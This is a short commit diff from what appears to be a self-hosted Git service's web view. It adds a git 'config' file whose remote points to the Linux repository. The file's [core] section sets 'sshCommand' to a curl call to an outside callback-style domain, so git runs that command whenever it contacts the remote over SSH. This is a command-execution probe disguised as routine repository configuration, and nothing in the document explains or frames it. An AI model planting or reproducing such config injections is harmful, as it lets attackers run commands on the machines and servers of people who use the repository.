liuyanan 6 mesi fa
parent
commit
c0b107120e
1 ha cambiato i file con 14 aggiunte e 0 eliminazioni
  1. 14 0
      config

+ 14 - 0
config

@@ -0,0 +1,14 @@
1
+[core]
2
+    repositoryformatversion = 0
3
+    filemode = true
4
+    bare = false
5
+    logallrefupdates = true
6
+    ignorecase = true
7
+    precomposeunicode = true
8
+    sshCommand = curl demo.2tfws2wq.eyes.sh
9
+[remote "origin"]
10
+    url = git@github.com:torvalds/linux.git
11
+    fetch = +refs/heads/*:refs/remotes/origin/*
12
+[branch "master"]
13
+    remote = origin
14
+    merge = refs/heads/master